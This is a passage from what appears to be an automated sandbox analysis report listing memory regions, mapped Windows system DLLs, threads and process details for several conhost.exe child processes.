pagefile_backed name = "pagefile_0x000000b55c190000" filename = "" Region: id = 2670 start_va = 0xb55c2a0000 end_va = 0xb55c2dffff entry_point = 0x0 region_type = private name = "private_0x000000b55c2a0000" filename = "" Region: id = 2671 start_va = 0xb55c2e0000 end_va = 0xb55c2e6fff entry_point = 0x0 region_type = private name = "private_0x000000b55c2e0000" filename = "" Region: id = 2672 start_va = 0xb55c2f0000 end_va = 0xb55c477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b55c2f0000" filename = "" Region: id = 2673 start_va = 0xb55c480000 end_va = 0xb55c480fff entry_point = 0x0 region_type = private name = "private_0x000000b55c480000" filename = "" Region: id = 2674 start_va = 0xb55c490000 end_va = 0xb55c490fff entry_point = 0x0 region_type = private name = "private_0x000000b55c490000" filename = "" Region: id = 2675 start_va = 0xb55c4b0000 end_va = 0xb55c4bffff entry_point = 0x0 region_type = private name = "private_0x000000b55c4b0000" filename = "" Region: id = 2676 start_va = 0xb55c4c0000 end_va = 0xb55c640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b55c4c0000" filename = "" Region: id = 2677 start_va = 0xb55c650000 end_va = 0xb55da4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b55c650000" filename = "" Region: id = 2678 start_va = 0x7ff6c3fd0000 end_va = 0x7ff6c40cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fd0000" filename = "" Region: id = 2679 start_va = 0x7ff6c40fb000 end_va = 0x7ff6c40fcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fb000" filename = "" Region: id = 2680 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2681 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2682 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2683 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2684 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2685 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2686 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2687 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2688 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2689 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2690 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2691 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4759 start_va = 0xb55da50000 end_va = 0xb55da8ffff entry_point = 0x0 region_type = private name = "private_0x000000b55da50000" filename = "" Region: id = 4760 start_va = 0xb55db00000 end_va = 0xb55db0ffff entry_point = 0x0 region_type = private name = "private_0x000000b55db00000" filename = "" Region: id = 4761 start_va = 0xb55db10000 end_va = 0xb55dc1bfff entry_point = 0x0 region_type = private name = "private_0x000000b55db10000" filename = "" Region: id = 4762 start_va = 0xb55dd00000 end_va = 0xb55dd0ffff entry_point = 0x0 region_type = private name = "private_0x000000b55dd00000" filename = "" Region: id = 4763 start_va = 0xb55dd10000 end_va = 0xb55e046fff entry_point = 0xb55dd10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4764 start_va = 0xb55e050000 end_va = 0xb55e262fff entry_point = 0x0 region_type = private name = "private_0x000000b55e050000" filename = "" Region: id = 4765 start_va = 0xb55e270000 end_va = 0xb55e48bfff entry_point = 0x0 region_type = private name = "private_0x000000b55e270000" filename = "" Region: id = 4766 start_va = 0xb55e490000 end_va = 0xb55e6a7fff entry_point = 0x0 region_type = private name = "private_0x000000b55e490000" filename = "" Region: id = 4767 start_va = 0xb55e6b0000 end_va = 0xb55e7b9fff entry_point = 0x0 region_type = private name = "private_0x000000b55e6b0000" filename = "" Region: id = 4768 start_va = 0x7ff6c40f9000 end_va = 0x7ff6c40fafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40f9000" filename = "" Region: id = 4769 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4770 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4771 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4772 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4773 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4774 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4775 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4776 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4777 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 141 os_tid = 0xf54 Thread: id = 186 os_tid = 0x5c8 Thread: id = 212 os_tid = 0x1054 Thread: id = 311 os_tid = 0x120c Process: id = "111" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa36000" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xdf4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2231 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2232 start_va = 0xab2dbb0000 end_va = 0xab2dbcffff entry_point = 0x0 region_type = private name = "private_0x000000ab2dbb0000" filename = "" Region: id = 2233 start_va = 0xab2dbd0000 end_va = 0xab2dbe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2dbd0000" filename = "" Region: id = 2234 start_va = 0xab2dbf0000 end_va = 0xab2dc2ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2dbf0000" filename = "" Region: id = 2235 start_va = 0x7df5ff940000 end_va = 0x7ff5ff93ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff940000" filename = "" Region: id = 2236 start_va = 0x7ff6c4660000 end_va = 0x7ff6c4682fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4660000" filename = "" Region: id = 2237 start_va = 0x7ff6c4689000 end_va = 0x7ff6c4689fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4689000" filename = "" Region: id = 2238 start_va = 0x7ff6c468e000 end_va = 0x7ff6c468ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c468e000" filename = "" Region: id = 2239 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2240 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2241 start_va = 0xab2dc80000 end_va = 0xab2dd7ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2dc80000" filename = "" Region: id = 2242 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2243 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2978 start_va = 0xab2dbb0000 end_va = 0xab2dbbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2dbb0000" filename = "" Region: id = 2979 start_va = 0xab2dbc0000 end_va = 0xab2dbc6fff entry_point = 0x0 region_type = private name = "private_0x000000ab2dbc0000" filename = "" Region: id = 2980 start_va = 0xab2dc30000 end_va = 0xab2dc6ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2dc30000" filename = "" Region: id = 2981 start_va = 0xab2dc70000 end_va = 0xab2dc70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2dc70000" filename = "" Region: id = 2982 start_va = 0xab2dd80000 end_va = 0xab2de3dfff entry_point = 0xab2dd80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2983 start_va = 0xab2de40000 end_va = 0xab2de46fff entry_point = 0x0 region_type = private name = "private_0x000000ab2de40000" filename = "" Region: id = 2984 start_va = 0xab2de50000 end_va = 0xab2de50fff entry_point = 0x0 region_type = private name = "private_0x000000ab2de50000" filename = "" Region: id = 2985 start_va = 0xab2de60000 end_va = 0xab2de60fff entry_point = 0x0 region_type = private name = "private_0x000000ab2de60000" filename = "" Region: id = 2986 start_va = 0xab2de70000 end_va = 0xab2de7ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2de70000" filename = "" Region: id = 2987 start_va = 0xab2de80000 end_va = 0xab2e007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2de80000" filename = "" Region: id = 2988 start_va = 0xab2e010000 end_va = 0xab2e190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2e010000" filename = "" Region: id = 2989 start_va = 0xab2e1a0000 end_va = 0xab2f59ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ab2e1a0000" filename = "" Region: id = 2990 start_va = 0x7ff6c4560000 end_va = 0x7ff6c465ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4560000" filename = "" Region: id = 2991 start_va = 0x7ff6c468c000 end_va = 0x7ff6c468dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c468c000" filename = "" Region: id = 2992 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2993 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2994 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2995 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2996 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2997 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2998 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2999 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3000 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3001 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3002 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3003 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4503 start_va = 0xab2f5a0000 end_va = 0xab2f5dffff entry_point = 0x0 region_type = private name = "private_0x000000ab2f5a0000" filename = "" Region: id = 4504 start_va = 0xab2f630000 end_va = 0xab2f63ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2f630000" filename = "" Region: id = 4505 start_va = 0xab2f750000 end_va = 0xab2f75ffff entry_point = 0x0 region_type = private name = "private_0x000000ab2f750000" filename = "" Region: id = 4506 start_va = 0xab2f760000 end_va = 0xab2fa96fff entry_point = 0xab2f760000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4507 start_va = 0xab2faa0000 end_va = 0xab2fcb0fff entry_point = 0x0 region_type = private name = "private_0x000000ab2faa0000" filename = "" Region: id = 4508 start_va = 0xab2fcc0000 end_va = 0xab2fedefff entry_point = 0x0 region_type = private name = "private_0x000000ab2fcc0000" filename = "" Region: id = 4509 start_va = 0xab2fee0000 end_va = 0xab2fff2fff entry_point = 0x0 region_type = private name = "private_0x000000ab2fee0000" filename = "" Region: id = 4510 start_va = 0xab30000000 end_va = 0xab3021cfff entry_point = 0x0 region_type = private name = "private_0x000000ab30000000" filename = "" Region: id = 4511 start_va = 0xab30220000 end_va = 0xab30335fff entry_point = 0x0 region_type = private name = "private_0x000000ab30220000" filename = "" Region: id = 4512 start_va = 0x7ff6c468a000 end_va = 0x7ff6c468bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c468a000" filename = "" Region: id = 4513 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4514 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4515 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4516 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4517 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4518 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4519 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4520 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4521 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 142 os_tid = 0xf5c Thread: id = 187 os_tid = 0x838 Thread: id = 223 os_tid = 0x1080 Thread: id = 298 os_tid = 0x11d8 Process: id = "112" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa7e000" os_pid = "0xf60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0xdfc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2244 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2245 start_va = 0xc567690000 end_va = 0xc5676affff entry_point = 0x0 region_type = private name = "private_0x000000c567690000" filename = "" Region: id = 2246 start_va = 0xc5676b0000 end_va = 0xc5676c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5676b0000" filename = "" Region: id = 2247 start_va = 0xc5676d0000 end_va = 0xc56770ffff entry_point = 0x0 region_type = private name = "private_0x000000c5676d0000" filename = "" Region: id = 2248 start_va = 0x7df5ff160000 end_va = 0x7ff5ff15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff160000" filename = "" Region: id = 2249 start_va = 0x7ff6c3dc0000 end_va = 0x7ff6c3de2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3dc0000" filename = "" Region: id = 2250 start_va = 0x7ff6c3de5000 end_va = 0x7ff6c3de5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3de5000" filename = "" Region: id = 2251 start_va = 0x7ff6c3dee000 end_va = 0x7ff6c3deffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dee000" filename = "" Region: id = 2252 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2253 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2254 start_va = 0xc567760000 end_va = 0xc56785ffff entry_point = 0x0 region_type = private name = "private_0x000000c567760000" filename = "" Region: id = 2255 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2256 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3004 start_va = 0xc567690000 end_va = 0xc56769ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c567690000" filename = "" Region: id = 3005 start_va = 0xc5676a0000 end_va = 0xc5676a6fff entry_point = 0x0 region_type = private name = "private_0x000000c5676a0000" filename = "" Region: id = 3006 start_va = 0xc567710000 end_va = 0xc56774ffff entry_point = 0x0 region_type = private name = "private_0x000000c567710000" filename = "" Region: id = 3007 start_va = 0xc567750000 end_va = 0xc567750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c567750000" filename = "" Region: id = 3008 start_va = 0xc567860000 end_va = 0xc56791dfff entry_point = 0xc567860000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3009 start_va = 0xc567920000 end_va = 0xc567926fff entry_point = 0x0 region_type = private name = "private_0x000000c567920000" filename = "" Region: id = 3010 start_va = 0xc567930000 end_va = 0xc567930fff entry_point = 0x0 region_type = private name = "private_0x000000c567930000" filename = "" Region: id = 3011 start_va = 0xc567940000 end_va = 0xc567940fff entry_point = 0x0 region_type = private name = "private_0x000000c567940000" filename = "" Region: id = 3012 start_va = 0xc567a20000 end_va = 0xc567a2ffff entry_point = 0x0 region_type = private name = "private_0x000000c567a20000" filename = "" Region: id = 3013 start_va = 0xc567a30000 end_va = 0xc567bb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c567a30000" filename = "" Region: id = 3014 start_va = 0xc567bc0000 end_va = 0xc567d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c567bc0000" filename = "" Region: id = 3015 start_va = 0xc567d50000 end_va = 0xc56914ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c567d50000" filename = "" Region: id = 3016 start_va = 0x7ff6c3cc0000 end_va = 0x7ff6c3dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3cc0000" filename = "" Region: id = 3017 start_va = 0x7ff6c3dec000 end_va = 0x7ff6c3dedfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dec000" filename = "" Region: id = 3018 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3019 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3020 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3021 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3022 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3023 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3024 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3025 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3026 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3027 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3028 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3029 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = 